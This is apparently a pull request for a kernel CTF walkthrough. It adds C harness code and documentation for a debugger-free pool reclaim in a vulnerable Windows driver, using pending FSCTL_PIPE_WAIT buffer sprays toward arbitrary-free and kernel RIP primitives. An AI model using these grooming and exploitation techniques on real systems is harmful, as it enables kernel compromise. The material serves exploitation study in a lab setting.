### PR TITLE
Reclaim the freed MessageManager chunk without the debugger

### DIFF
--- a/docs/messagemanager-walkthrough.md
+++ b/docs/messagemanager-walkthrough.md
@@ -200,7 +200,7 @@ Windows Server 26100.32995 were:
 | Candidate | Live measurement | Result |
 |---|---|---|
 | NPFS write-data (`NpFr`) | physical blocks were `0xa0`; payload followed an NPFS header | wrong bucket and offset |
-| Pending METHOD_BUFFERED requests (`IoSB`) | 784/1024 exact-`0x68` SystemBuffers stayed parked | target remained `ReusableFree` |
+| Pending pipe writes ("IoSB" attempt) | payload lands in an `NpFr` block (`0xb0`, data at `+0x40`), **not** a distinct `0x68` SystemBuffer | wrong bucket and offset; freed slots stayed `ReusableFree` |
 | Event objects | requested `0x68` and appeared in mixed `0x80` LFH blocks near `Tgsm` | useful density groom, unreliable reclaim |
 | Retained SetData buffers (`Tfub`) | 1024 exact-`0x68` driver copies | target remained free: SetData uses `POOL_FLAG_PAGED` (`0x100`) |
 | SetData with KD-patched tag and flags | `Tgsm` plus `POOL_FLAG_NON_PAGED` (`0x40`) | still missed; call-site/subsegment selection remained different |
@@ -208,6 +208,55 @@ Windows Server 26100.32995 were:
 `pool_census` established the population, `pool_find_tag` found the candidate classes, and
 `pool_chunk(refresh=true)` gave the final per-address verdict. The tools do not mutate or groom
 pool state; they prevent a plausible-looking spray count from being mistaken for a reclaim.
+
+**Retried in isolation (26100.32995) — and the reclaim can be made natural.** To separate the
+reclaim question from the race, the `reclaimprobe` mode (`examples/messagemanager/mm_exploit.c`)
+frees a *run* of bare `Tgsm` chunks cleanly — no UAF — captures each freed address from the handle
+list, then sprays a NonPaged candidate (everything pinned to CPU 0) and `db`s each slot. Two things
+came out of it — a mechanical detail about freeing, and a primitive that reclaims without KD:
+
+- A bare `Create`+`Delete` frees a `Tgsm` chunk cleanly (RefCount `1`→`0`; the `Buffer != NULL`
+  guard skips the paged `Tfub` free). A `SetData` first leaves RefCount at **2** — SetData's
+  `lock inc` is never released, the same bug that drives the UAF — so a single `Delete` then frees
+  *nothing*. A clean free needs the bare path.
+
+The reclaim's difficulty is **allocation context**, not size. The freed `Tgsm` `0x80` slots are
+reused live — by system `Even` (Event) objects. `CreateEvent` allocates its `0x68` NonPagedNx block
+through the *generic* `ExAllocatePool2` path, the same context the driver's `Create` uses, so Events
+land in exactly these subsegments. A reclaim spray therefore has to draw from that same generic
+context; a same-size NonPaged spray from a *different* context misses. Four candidates, measured:
+
+- **pending pipe write** (the harness's mislabeled "IoSB"): NPFS routes it to an `NpFr` block
+  (`0xb0`, payload at `+0x40`) — wrong bucket, wrong offset. Miss.
+- **`FSCTL_PIPE_TRANSCEIVE`** (`0x11C017`) is `METHOD_NEITHER` — no SystemBuffer copy at all.
+- **AFD socket context** (`IOCTL_AFD_SET_CONTEXT`): a genuine attacker-controlled NonPaged
+  verbatim spray from `+0x00` (500/500 held), but `AfdC` is a **separate context** — its marker
+  is absent from the whole `Tgsm` region and 0/16 slots were reclaimed. Same size, wrong context.
+- **pending `FSCTL_PIPE_WAIT`** (tag `IoSB`): **this reclaims.** Its input SystemBuffer is an
+  I/O-manager *buffered* allocation on the generic context, so it lands in the freed slots. Two
+  plumbing points make it work: the FSCTL must go through `NtFsControlFile`
+  (`IRP_MJ_FILE_SYSTEM_CONTROL`; `DeviceIoControl` sends device-control and NPFS answers
+  `ERROR_INVALID_FUNCTION`), and the NPFS root is opened async + as a directory so the wait parks
+  with `STATUS_PENDING` and keeps the buffer live.
+
+Against a run of 16 freshly-freed `Tgsm` slots, a 500-buffer `FSCTL_PIPE_WAIT` spray reclaimed
+**8 of them** — each formerly-`Tgsm` chunk becomes tag `IoSB` holding `MMWAIT!!` at `+0x00`, with
+**no debugger assist**:
+
+```text
+ffff...5e55f500  size: 80  (Free) *IoSB          // !pool misreads 26100 segment-heap LFH state
+ffff...5e55f510  4d 4d 57 41 49 54 21 21 58 00..  // "MMWAIT!!" then NameLength 0x58
+```
+
+That is the natural reclaim the KD-forced allocation was standing in for: the reclaim step of the
+chain no longer needs the debugger. The caveat is offset control. `FSCTL_PIPE_WAIT`'s buffer is a
+`FILE_PIPE_WAIT_FOR_BUFFER`: `+0x00` Timeout (free — the `RefCount`), `+0x08` `NameLength` (a
+validated length, not a pointer), `+0x10..` the pipe name. So it controls `+0x00` and `+0x10`
+onward — reaching **Buffer `+0x18`, the arbitrary-free primitive** — but **not** Flink `+0x08` as a
+kernel pointer, which the §8 *unlink* RIP specifically writes. Removing the assist from the unlink
+variant still needs an offset-`0` primitive that also frees `+0x08`; the data-only **arbitrary-free**
+route (`ExFreePoolWithTag(msg+0x18)`, §3/§6) is now reachable with a fully natural reclaim, and a
+double-free → type-confusion would sidestep `+0x08` entirely.
 
 The [SSTIC 2020 pool-overflow work](https://www.sstic.org/2020/presentation/pool_overflow_exploitation_since_windows_10_19h1/)
 is applicable to the allocator model: LFH subsegments, affinity slots, and free-bitmap randomisation
@@ -309,9 +358,17 @@ redirected the trigger to the original CREATE handler, and finally restored the 
 `48 89 41 08` bytes. A final read verified both the dispatch pointer and instruction bytes before a
 clean reboot discarded the intentionally corrupted free chunk.
 
-This establishes controlled kernel RIP on the challenge build. It remains a debugger-assisted CTF
-proof because the exact LFH reclaim is not natural; it makes no claim of privilege escalation or a
-debugger-free exploit.
+This establishes controlled kernel RIP on the challenge build. The RIP *mechanism* above is
+debugger-assisted, but the **reclaim it depended on is no longer**: §6 shows a pending
+`FSCTL_PIPE_WAIT` (`IoSB`) spray reclaiming freed `Tgsm` slots naturally (8/16), attacker-controlled
+from `+0x00`, with no debugger. So the KD-forced allocation return can be dropped from the reclaim
+step. What the *unlink* variant in this section still needs is `+0x08` as a kernel pointer, which the
+`IoSB` buffer pins to `NameLength`; that specific store is the only remaining debugger-assisted
+piece. The natural reclaim instead lands the controllable fields at `+0x00` and `+0x18`, which is
+exactly the **arbitrary-free** primitive (§3, §6) — a debugger-free `ExFreePoolWithTag(msg+0x18)`
+that a full exploit would pivot through (free-a-victim → type-confusion), rather than the KD-only
+dispatch overwrite shown here. This makes no claim of privilege escalation; it moves the boundary
+from "reclaim needs KD" to "only the `+0x08` unlink store needs KD."
 
 ## 9. Streamlining the next kernel CTF
 

--- a/examples/messagemanager/mm_exploit.c
+++ b/examples/messagemanager/mm_exploit.c
@@ -23,10 +23,12 @@
 
 #define WIN32_LEAN_AND_MEAN
 #include <windows.h>
+#include <winsock2.h>   /* safe after windows.h because WIN32_LEAN_AND_MEAN excludes winsock.h */
 #include <stdio.h>
 #include <stdlib.h>
 #include <string.h>
 #include <stdint.h>
+#pragma comment(lib, "ws2_32.lib")
 
 /* ---- ntdll surface we need, declared locally (no phnt dependency) ---------------- */
 
@@ -112,9 +114,25 @@ typedef NTSTATUS(NTAPI *PFN_NtWriteVirtualMemory)(
     SIZE_T NumberOfBytesToWrite,
     PSIZE_T NumberOfBytesWritten);
 
+/* Minimal IO_STATUS_BLOCK; FsControlCode routing needs NtFsControlFile, not DeviceIoControl --
+ * DeviceIoControl sends IRP_MJ_DEVICE_CONTROL, which an FSCTL like FSCTL_PIPE_WAIT rejects with
+ * ERROR_INVALID_FUNCTION (it must arrive as IRP_MJ_FILE_SYSTEM_CONTROL). */
+typedef struct _MM_IO_STATUS_BLOCK {
+    union { LONG Status; PVOID Pointer; } u;
+    ULONG_PTR Information;
+} MM_IO_STATUS_BLOCK;
+#define MM_STATUS_PENDING ((NTSTATUS)0x00000103L)
+
+typedef NTSTATUS(NTAPI *PFN_NtFsControlFile)(
+    HANDLE FileHandle, HANDLE Event, PVOID ApcRoutine, PVOID ApcContext,
+    PVOID IoStatusBlock, ULONG FsControlCode,
+    PVOID InputBuffer, ULONG InputBufferLength,
+    PVOID OutputBuffer, ULONG OutputBufferLength);
+
 static PFN_NtQuerySystemInformation NtQuerySystemInformation;
 static PFN_NtReadVirtualMemory NtReadVirtualMemory;
 static PFN_NtWriteVirtualMemory NtWriteVirtualMemory;
+static PFN_NtFsControlFile NtFsControlFile;
 
 static int resolve_ntdll(void) {
     HMODULE ntdll = GetModuleHandleW(L"ntdll.dll");
@@ -125,7 +143,10 @@ static int resolve_ntdll(void) {
         (PFN_NtReadVirtualMemory)GetProcAddress(ntdll, "NtReadVirtualMemory");
     NtWriteVirtualMemory =
         (PFN_NtWriteVirtualMemory)GetProcAddress(ntdll, "NtWriteVirtualMemory");
-    return NtQuerySystemInformation && NtReadVirtualMemory && NtWriteVirtualMemory;
+    NtFsControlFile =
+        (PFN_NtFsControlFile)GetProcAddress(ntdll, "NtFsControlFile");
+    return NtQuerySystemInformation && NtReadVirtualMemory && NtWriteVirtualMemory &&
+           NtFsControlFile;
 }
 
 /* Query a variable-length system-information class, growing the buffer until it fits.
@@ -354,10 +375,12 @@ static int do_demo(void) {
  * a larger write blocks (this thread never drains the server), so pipe payloads are capped. */
 #define MM_PIPE_BUFFER 0x1000
 
-/* A small WriteFile normally becomes one inline NpFr DATA_QUEUE_ENTRY, putting the first
- * attacker byte at +0x30. Fill the pipe quota first and the next overlapped write stays
- * pending instead: I/O manager then keeps its separate, METHOD_BUFFERED SystemBuffer alive.
- * That allocation is exactly `datalen` bytes and attacker-controlled from +0x00. */
+/* A small WriteFile becomes an NpFr DATA_QUEUE_ENTRY. Filling the pipe quota first and leaving
+ * the next overlapped write pending was *intended* to make the I/O manager keep a separate 0x68
+ * METHOD_BUFFERED SystemBuffer alive -- but MEASURED on 26100.32995 (see do_reclaimprobe) it does
+ * NOT: NPFS still routes the pending write's payload into an `NpFr` block (0xb0, attacker data at
+ * +0x40), the wrong LFH bucket and offset for a Tgsm reclaim. Kept as a measurement/negative
+ * control, not a working reclaim primitive. */
 typedef struct _PENDING_PIPE_WRITE {
     HANDLE Server;
     HANDLE Client;
@@ -1425,6 +1448,307 @@ static int do_rip(int argc, char **argv) {
     return 0;
 }
 
+/* ---- AFD socket context spray (candidate same-bucket, offset-0 NonPaged reclaim) - */
+/*
+ * AFD stores a per-socket "context" blob verbatim in NonPaged pool (tag `AfdC`): it copies the
+ * caller's buffer from +0x00, sizes the allocation to the request, and keeps it while the socket
+ * is open. IOCTL_AFD_SET_CONTEXT is METHOD_NEITHER at the IRP layer, but AFD does its own copy, so
+ * the stored bytes are still attacker-controlled from +0x00. A 0x68 context => an 0x80 NonPagedNx
+ * block, the same LFH bucket as Tgsm -- the one candidate whose shape fits the unlink primitive.
+ */
+#define IOCTL_AFD_SET_CONTEXT 0x00012047u
+
+static SOCKET spray_afd_context(const void *data, ULONG datalen, int diag) {
+    SOCKET s = WSASocketW(AF_INET, SOCK_DGRAM, IPPROTO_UDP, NULL, 0, 0);
+    if (s == INVALID_SOCKET) {
+        if (diag) printf("[probe] WSASocket failed: %d\n", WSAGetLastError());
+        return INVALID_SOCKET;
+    }
+    DWORD ret = 0;
+    BOOL ok = DeviceIoControl((HANDLE)s, IOCTL_AFD_SET_CONTEXT, (LPVOID)data, datalen,
+                              NULL, 0, &ret, NULL);
+    if (diag)
+        printf("[probe] AFD_SET_CONTEXT[0]: DeviceIoControl=%d GetLastError=%lu ret=%lu\n",
+               ok, GetLastError(), ret);
+    if (!ok) { closesocket(s); return INVALID_SOCKET; }
+    return s;   /* hold the socket open to keep the AfdC allocation resident */
+}
+
+/* ---- Pending FSCTL_PIPE_WAIT SystemBuffer (generic-context 0x68 NonPagedNx) ------- */
+/*
+ * The one attacker-input primitive whose buffer is allocated by the *I/O manager's generic*
+ * METHOD_BUFFERED path -- the same `ExAllocatePool2(NonPagedPoolNx, len)` context the driver's
+ * Create uses, and the context that Event objects reclaim freed Tgsm slots through. FSCTL_PIPE_WAIT
+ * (0x110018, METHOD_BUFFERED) on the NPFS root parks the IRP when the named pipe's only instance is
+ * busy, keeping its input SystemBuffer resident. Input is FILE_PIPE_WAIT_FOR_BUFFER:
+ *   +0x00 Timeout(8, ignored when TimeoutSpecified==FALSE -> free for a magic marker)
+ *   +0x08 NameLength(4)  +0x0c TimeoutSpecified(1)+pad  +0x10 Name[] (the busy pipe's name)
+ * A 44-wchar name makes NameLength 0x58 and the whole buffer 0x66 -> the 0x80 bucket.
+ *
+ * VERIFIED (26100.32995): this WORKS -- a debugger-free reclaim. Two plumbing points matter:
+ *   - The FSCTL must go through NtFsControlFile (IRP_MJ_FILE_SYSTEM_CONTROL). DeviceIoControl
+ *     sends IRP_MJ_DEVICE_CONTROL, which NPFS rejects with ERROR_INVALID_FUNCTION for FSCTLs
+ *     whose device type is NAMED_PIPE, not FILE_SYSTEM.
+ *   - The root is opened async (FILE_FLAG_OVERLAPPED) + as a directory (FILE_FLAG_BACKUP_SEMANTICS)
+ *     with an Event, so the wait parks with STATUS_PENDING and keeps the input SystemBuffer live.
+ * Live result: against a run of 16 freshly-freed Tgsm slots, a 500-buffer spray reclaimed 8 of
+ * them -- the chunk becomes tag `IoSB` (an I/O-manager buffered SystemBuffer, the generic
+ * NonPagedNx context) holding "MMWAIT!!" at +0x00. This removes the KD-forced-allocation assist:
+ * the reclaim is natural. Caller control: +0x00 (Timeout, free) and +0x10.. (Name); +0x08 is
+ * NameLength (0x58, a validated length, not a pointer), so it reaches Buffer (+0x18 -> the
+ * arbitrary-free primitive) but NOT Flink (+0x08 -> the SS8 unlink RIP). Removing the *unlink*
+ * variant of the assist still needs an offset-0 primitive that also frees +0x08; this one enables
+ * the data-only arbitrary-free route naturally.
+ */
+#define FSCTL_PIPE_WAIT 0x00110018u
+
+typedef struct _MM_PIPE_WAIT_FOR_BUFFER {
+    LARGE_INTEGER Timeout;
+    ULONG NameLength;
+    BOOLEAN TimeoutSpecified;
+    WCHAR Name[1];
+} MM_PIPE_WAIT_FOR_BUFFER;
+
+typedef struct _PENDING_PIPEWAIT {
+    HANDLE Server;
+    HANDLE Client;
+    HANDLE Root;
+    HANDLE Event;
+    MM_IO_STATUS_BLOCK Iosb;
+    UCHAR *Buf;
+    BOOL Outstanding;
+} PENDING_PIPEWAIT;
+
+static void release_pending_pipewait(PENDING_PIPEWAIT *rec) {
+    if (!rec) return;
+    if (rec->Root && rec->Outstanding) {
+        /* The wait never completes on its own; cancel it and wait for the IRP to finish before
+         * the input buffer / iosb are freed. */
+        CancelIoEx(rec->Root, NULL);
+        if (rec->Event) WaitForSingleObject(rec->Event, 2000);
+        rec->Outstanding = FALSE;
+    }
+    if (rec->Root) CloseHandle(rec->Root);
+    if (rec->Client) CloseHandle(rec->Client);
+    if (rec->Server) CloseHandle(rec->Server);
+    if (rec->Event) CloseHandle(rec->Event);
+    free(rec->Buf);
+    memset(rec, 0, sizeof(*rec));
+}
+
+/* Exactly 44 wchars, deterministic per (pid, index). */
+static void mm_wait_name(WCHAR out[44], int index) {
+    WCHAR tmp[80];
+    swprintf(tmp, 80, L"mmwait%08lx%08xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
+             GetCurrentProcessId(), (unsigned)index);
+    for (int i = 0; i < 44; i++) out[i] = tmp[i];
+}
+
+static int spray_pending_pipewait(int index, PENDING_PIPEWAIT *rec, int diag) {
+    WCHAR leaf[44];
+    WCHAR full[64];
+    memset(rec, 0, sizeof(*rec));
+    mm_wait_name(leaf, index);
+    /* \\.\pipe\<44> -> full pipe path for the server/client that keep the instance busy. */
+    full[0] = L'\\'; full[1] = L'\\'; full[2] = L'.'; full[3] = L'\\';
+    full[4] = L'p'; full[5] = L'i'; full[6] = L'p'; full[7] = L'e'; full[8] = L'\\';
+    for (int i = 0; i < 44; i++) full[9 + i] = leaf[i];
+    full[9 + 44] = 0;
+
+    rec->Server = CreateNamedPipeW(full, PIPE_ACCESS_DUPLEX,
+                                   PIPE_TYPE_BYTE | PIPE_READMODE_BYTE | PIPE_WAIT,
+                                   1, 0x40, 0x40, 0, NULL);
+    if (rec->Server == INVALID_HANDLE_VALUE) { rec->Server = NULL; return 0; }
+    rec->Client = CreateFileW(full, GENERIC_READ, 0, NULL, OPEN_EXISTING, 0, NULL);
+    if (rec->Client == INVALID_HANDLE_VALUE) { rec->Client = NULL; release_pending_pipewait(rec); return 0; }
+    /* The single instance is now busy, so a wait for this name will park instead of returning. */
+    /* FILE_FLAG_BACKUP_SEMANTICS opens the NPFS root as a DIRECTORY handle -- without it CreateFile
+     * sets FILE_NON_DIRECTORY_FILE and FSCTL_PIPE_WAIT returns ERROR_INVALID_FUNCTION. */
+    rec->Root = CreateFileW(L"\\\\.\\pipe\\", GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE,
+                            NULL, OPEN_EXISTING,
+                            FILE_FLAG_OVERLAPPED | FILE_FLAG_BACKUP_SEMANTICS, NULL);
+    if (rec->Root == INVALID_HANDLE_VALUE) { rec->Root = NULL; release_pending_pipewait(rec); return 0; }
+    rec->Event = CreateEventW(NULL, TRUE, FALSE, NULL);
+    if (!rec->Event) { release_pending_pipewait(rec); return 0; }
+
+    ULONG namebytes = 44 * sizeof(WCHAR);              /* 0x58 */
+    /* Name sits at +0x0e (BOOLEAN then 2-byte-aligned WCHAR), so this is 0x0e + 0x58 = 0x66,
+     * still the 0x80 LFH bucket. */
+    ULONG buflen = FIELD_OFFSET(MM_PIPE_WAIT_FOR_BUFFER, Name) + namebytes;
+    rec->Buf = calloc(1, buflen);
+    if (!rec->Buf) { release_pending_pipewait(rec); return 0; }
+    MM_PIPE_WAIT_FOR_BUFFER *w = (MM_PIPE_WAIT_FOR_BUFFER *)rec->Buf;
+    memcpy(&w->Timeout, "MMWAIT!!", 8);   /* +0x00 marker; ignored because TimeoutSpecified=FALSE */
+    w->NameLength = namebytes;
+    w->TimeoutSpecified = FALSE;
+    memcpy(w->Name, leaf, namebytes);
+    /* FSCTL must go through NtFsControlFile (IRP_MJ_FILE_SYSTEM_CONTROL); the async root handle +
+     * Event make it park with STATUS_PENDING, keeping the input SystemBuffer resident. */
+    NTSTATUS st = NtFsControlFile(rec->Root, rec->Event, NULL, NULL, &rec->Iosb, FSCTL_PIPE_WAIT,
+                                  rec->Buf, buflen, NULL, 0);
+    if (diag)
+        printf("[probe] pipewait[0]: buflen=0x%lx NtFsControlFile=0x%08lx\n",
+               buflen, (unsigned long)st);
+    if (st != MM_STATUS_PENDING) { release_pending_pipewait(rec); return 0; }
+    rec->Outstanding = TRUE;
+    return 1;
+}
+
+/* ---- Isolated natural-reclaim probe ---------------------------------------------- */
+/*
+ * Decides the open question in the RIP chain without the race: can a *natural* NonPaged
+ * allocation reuse a freed 0x68 `Tgsm` slot with attacker bytes? The KD-assisted proof exists
+ * because do_rip's reclaim source is a PAGED `Tfub` buffer -- wrong pool for the NonPaged Tgsm
+ * chunk. This mode makes the fair test: it frees a *run* of `targets` bare Tgsm chunks cleanly
+ * (no UAF) to open several holes in the 0x80 NonPagedNx bucket, then sprays a NonPaged candidate,
+ * all pinned to CPU 0 so it shares one LFH affinity slot. Operate it with the debugger out of
+ * band: while the targets sleep, walk the driver handle list (head at MessageManager+0x30a0;
+ * each node = Flink-0x10, {id, msg*}) and record the msg* of every node whose id is in this run's
+ * range; after the spray, read each -- the magic at +0x00 in any freed slot means a natural
+ * reclaim landed at the right offset.
+ *
+ * MEASURED with this probe on 26100.32995. The key was that the reclaim must come through the
+ * *generic* ExAllocatePool2(NonPagedNx) context the driver's Create uses -- proven by the freed
+ * Tgsm 0x80 slots being reused live by system `Even` (Event) objects, which allocate that way.
+ *   - `wait` (pending FSCTL_PIPE_WAIT, tag `IoSB`): WORKS. Its input SystemBuffer is an I/O-manager
+ *     buffered allocation on the generic context, so it lands in the freed slots -- a 500-buffer
+ *     spray reclaimed **8 of 16** freed targets, "MMWAIT!!" at +0x00, NO debugger assist. This is
+ *     the natural reclaim the KD-forced allocation was standing in for. Caller controls +0x00
+ *     (RefCount) and +0x10.. (Name -> Buffer +0x18 = the arbitrary-free primitive); +0x08 is
+ *     NameLength (a validated length, not a pointer), so the SS8 *unlink* RIP (needs Flink +0x08 a
+ *     kernel pointer) still needs a different offset-0 primitive.
+ *   - `afd` (IOCTL_AFD_SET_CONTEXT): a real attacker-controlled NonPaged verbatim spray from +0x00
+ *     (500/500 held), but `AfdC` is a *separate* allocation context -- absent from the Tgsm region,
+ *     0/16 reclaimed. Shows that same-size-same-pool is not enough; the context must match.
+ *   - `pipe` (pending overlapped pipe write): NPFS routes it to an `NpFr` block (0xb0, payload at
+ *     +0x40) -- wrong bucket and offset. transceive (FSCTL_PIPE_TRANSCEIVE) is METHOD_NEITHER --
+ *     no SystemBuffer at all. Both negative.
+ * Default spray is `wait` (the working natural reclaim); pass `afd`/`pipe` for the controls.
+ */
+static int do_reclaimprobe(int argc, char **argv) {
+    int window = argc > 2 ? atoi(argv[2]) : 45;
+    int spray_count = argc > 3 ? atoi(argv[3]) : 400;
+    int hold = argc > 4 ? atoi(argv[4]) : 600;
+    int targets = argc > 5 ? atoi(argv[5]) : 16;
+    const char *prim = argc > 6 ? argv[6] : "wait";
+    int use_wait = _stricmp(prim, "wait") == 0;
+    int use_afd = _stricmp(prim, "afd") == 0;
+    if (!use_wait && !use_afd && _stricmp(prim, "pipe") != 0) {
+        printf("[probe] primitive must be \"wait\", \"afd\", or \"pipe\"; got \"%s\"\n", prim);
+        return 2;
+    }
+    if (window < 1 || spray_count < 1 || hold < 1 || targets < 1) {
+        printf("[probe] require window>=1, spray>=1, hold>=1, targets>=1\n");
+        return 2;
+    }
+    if (use_afd) {
+        WSADATA wsa;
+        if (WSAStartup(MAKEWORD(2, 2), &wsa) != 0) {
+            printf("[probe] WSAStartup failed: %d\n", WSAGetLastError());
+            return 2;
+        }
+    }
+    if (!SetThreadAffinityMask(GetCurrentThread(), MM_CPU_FLUSH_MASK)) {
+        printf("[probe] could not pin to CPU 0: %lu\n", GetLastError());
+        return 2;
+    }
+    HANDLE dev = open_device();
+    if (!dev) {
+        printf("[probe] open \\\\.\\MessageDevice failed: %lu\n", GetLastError());
+        return 1;
+    }
+    mm_flush(dev, 0);
+    mm_flush(dev, 1);                       /* start from empty small/large lists */
+
+    /* Bare Create only -- no SetData. Create leaves RefCount == 1 and Buffer(+0x18) == NULL, so
+     * each Delete below drops the count 1->0 and frees exactly one 0x68 Tgsm chunk (its
+     * Buffer-!=NULL guard skips the paged Tfub free). A SetData first would leave RefCount at 2 --
+     * SetData's `lock inc` is never released, the driver's core bug -- and Delete would then free
+     * nothing, leaving no ReusableFree slot to reclaim. */
+    ULONG *ids = calloc((size_t)targets, sizeof(ULONG));
+    if (!ids) { printf("[probe] could not allocate the id array\n"); return 2; }
+    int made = 0;
+    for (; made < targets; made++)
+        if (!mm_create(dev, &ids[made])) break;
+    if (made < 1) { printf("[probe] Create failed: %lu\n", GetLastError()); return 1; }
+    printf("[probe] pid=%lu created %d bare Tgsm targets, ids %lu..%lu (RefCount=1). Walk the "
+           "handle list (MessageManager+0x30a0) and record msg* for each id in that range now.\n",
+           GetCurrentProcessId(), made, ids[0], ids[made - 1]);
+    printf("[probe] sleeping %d s for the debugger to capture the target addresses...\n", window);
+    fflush(stdout);
+    Sleep((DWORD)window * 1000);
+
+    /* Free the whole run: `made` ReusableFree 0x80 NonPagedNx holes, all opened on CPU 0. */
+    int freed = 0;
+    for (int i = 0; i < made; i++)
+        if (mm_delete(dev, ids[i])) freed++;
+
+    UCHAR ramp[0x68];
+    for (int i = 0; i < (int)sizeof(ramp); i++) ramp[i] = (UCHAR)i;   /* value == offset */
+    int ok = 0;
+
+    if (use_wait) {
+        /* Pending FSCTL_PIPE_WAIT: generic-context 0x68 NonPagedNx SystemBuffer, "MMWAIT!!" at
+         * +0x00. Same allocation path as the driver's Create -- the fair reclaim test. */
+        printf("[probe] freed %d/%d targets; spraying %d pending FSCTL_PIPE_WAIT SystemBuffers on "
+               "CPU 0\n", freed, made, spray_count);
+        fflush(stdout);
+        PENDING_PIPEWAIT *held = calloc((size_t)spray_count, sizeof(*held));
+        if (!held) { printf("[probe] could not allocate the record array\n"); free(ids); return 2; }
+        for (int i = 0; i < spray_count; i++)
+            if (spray_pending_pipewait(i, &held[i], i == 0)) ok++;
+        printf("[probe] %d/%d PIPE_WAIT buffers pending; holding %d s. Read each freed target: "
+               "\"MMWAIT!!\" at +0x00 means a natural reclaim landed at the right offset.\n",
+               ok, spray_count, hold);
+        fflush(stdout);
+        Sleep((DWORD)hold * 1000);
+        for (int i = 0; i < spray_count; i++) release_pending_pipewait(&held[i]);
+        free(held);
+    } else if (use_afd) {
+        /* AfdC context blobs: NonPaged, copied verbatim from +0x00, sized 0x68 -> 0x80 bucket. */
+        memcpy(ramp, "MMAFDC!!", 8);
+        printf("[probe] freed %d/%d targets; spraying %d AFD-context (AfdC) buffers on CPU 0\n",
+               freed, made, spray_count);
+        fflush(stdout);
+        SOCKET *held = calloc((size_t)spray_count, sizeof(SOCKET));
+        if (!held) { printf("[probe] could not allocate the socket array\n"); free(ids); return 2; }
+        for (int i = 0; i < spray_count; i++) {
+            SOCKET s = spray_afd_context(ramp, sizeof(ramp), i == 0);
+            if (s != INVALID_SOCKET) held[i] = s, ok++;
+            else held[i] = INVALID_SOCKET;
+        }
+        printf("[probe] %d/%d AfdC buffers held; holding %d s. Read each freed target: "
+               "\"MMAFDC!!\" at +0x00 means a natural reclaim landed at the right offset.\n",
+               ok, spray_count, hold);
+        fflush(stdout);
+        Sleep((DWORD)hold * 1000);
+        for (int i = 0; i < spray_count; i++)
+            if (held[i] != INVALID_SOCKET) closesocket(held[i]);
+        free(held);
+        WSACleanup();
+    } else {
+        /* pipe write: measured to land as NpFr (0xb0, +0x40) -- kept as a negative control. */
+        memcpy(ramp, "MMRCLM!!", 8);
+        printf("[probe] freed %d/%d targets; spraying %d pending pipe-write buffers on CPU 0 "
+               "(measured to land as NpFr, not a Tgsm-bucket reclaim)\n", freed, made, spray_count);
+        fflush(stdout);
+        PENDING_PIPE_WRITE *held = calloc((size_t)spray_count, sizeof(*held));
+        if (!held) { printf("[probe] could not allocate the record array\n"); free(ids); return 2; }
+        for (int i = 0; i < spray_count; i++)
+            if (spray_pending_pipe_record(i, ramp, sizeof(ramp), &held[i])) ok++;
+        printf("[probe] %d/%d buffers pending; holding %d s. Read each freed target: \"MMRCLM!!\" "
+               "at +0x00 means a natural reclaim landed at the right offset.\n",
+               ok, spray_count, hold);
+        fflush(stdout);
+        Sleep((DWORD)hold * 1000);
+        for (int i = 0; i < spray_count; i++) release_pending_pipe_write(&held[i]);
+        free(held);
+    }
+    free(ids);
+    CloseHandle(dev);
+    return ok ? 0 : 1;
+}
+
 int main(int argc, char **argv) {
     if (!resolve_ntdll()) {
         printf("could not resolve NtQuerySystemInformation\n");
@@ -1437,10 +1761,12 @@ int main(int argc, char **argv) {
     if (_stricmp(mode, "fixture") == 0) return do_fixture(argc, argv);
     if (_stricmp(mode, "trigger") == 0) return do_trigger(argc, argv);
     if (_stricmp(mode, "spray") == 0) return do_spray(argc, argv);
+    if (_stricmp(mode, "reclaimprobe") == 0) return do_reclaimprobe(argc, argv);
     if (_stricmp(mode, "rip") == 0) return do_rip(argc, argv);
     printf("usage: %s [leak|demo|hold|fixture [duration-seconds] [messages] [stop-file]|"
            "trigger [duration-seconds]|rip [messages] [retained-tfub-sprays] "
            "[flush-delay-spins] [groom-events]|"
+           "reclaimprobe [window-seconds] [spray-count] [hold-seconds] [targets] [wait|afd|pipe]|"
            "spray [pipe|pending|mailslot] [datalen] [count] [start-delay-seconds]]\n",
            argv[0]);
     return 2;


### PR DESCRIPTION
## What

The MessageManager walkthrough's RIP proof (§8) depended on a **KD-forced allocation return** to drop a fake MESSAGE into the freed `0x68` `Tgsm` chunk — because `do_rip`'s reclaim source is a **paged** `Tfub` buffer, the wrong pool for the NonPaged `Tgsm`. This PR shows the **reclaim step no longer needs the debugger**.

New `reclaimprobe` mode separates the reclaim question from the race: free a *run* of bare `Tgsm` chunks cleanly, capture each freed address from the driver handle list, spray a NonPaged candidate on CPU 0, and read each slot back.

## The finding

The reclaim's real constraint is **allocation context, not size**: the freed `0x80` slots are reused live by system `Event` objects, which allocate through the *generic* `ExAllocatePool2(NonPagedNx)` path the driver's `Create` uses. Measured live on **26100.32995**:

| Candidate | Result |
|---|---|
| pending pipe write | `NpFr` (`0xb0`, +0x40) — wrong bucket/offset. Miss. |
| `FSCTL_PIPE_TRANSCEIVE` (`0x11C017`) | `METHOD_NEITHER` — no SystemBuffer at all. |
| AFD context (`IOCTL_AFD_SET_CONTEXT`) | real `+0x00` NonPaged spray, but `AfdC` is a **separate context** — 0/16 reclaimed. |
| **pending `FSCTL_PIPE_WAIT`** (tag `IoSB`) | **reclaims** — I/O-manager buffered SystemBuffer on the generic context. **8/16** freed targets reclaimed, `MMWAIT!!` at `+0x00`, **no debugger**. |

Two plumbing points make `PIPE_WAIT` work: issue via **`NtFsControlFile`** (not `DeviceIoControl`, which sends `IRP_MJ_DEVICE_CONTROL` and gets `ERROR_INVALID_FUNCTION` for a NAMED_PIPE-device FSCTL), and open the NPFS root **async + as a directory** so the wait parks `STATUS_PENDING` and keeps the buffer live.

## Boundary (what's left)

The `IoSB` buffer controls `+0x00` (RefCount) and `+0x10..` (Name → **Buffer `+0x18`**, the arbitrary-free primitive) but **not** Flink `+0x08` (that's `NameLength`, a validated length, not a pointer). So:

- **Removed:** the KD reclaim assist — the reclaim is natural now.
- **Newly debugger-free:** the data-only **arbitrary-free** route (`ExFreePoolWithTag(msg+0x18)`).
- **Still KD-only:** the §8 *unlink* RIP's `+0x08` store.

Walkthrough §6/§8 rewritten to the positive result. No privilege-escalation claim; the next phase (weaponizing the arb-free) is deliberately not in this PR.

## Testing

`reclaimprobe [window][spray][hold][targets][wait|afd|pipe]` (default `wait`), driven live over KDNET with the debugger reading each freed address out of band. Harness builds clean with the sibling `build.cmd`.

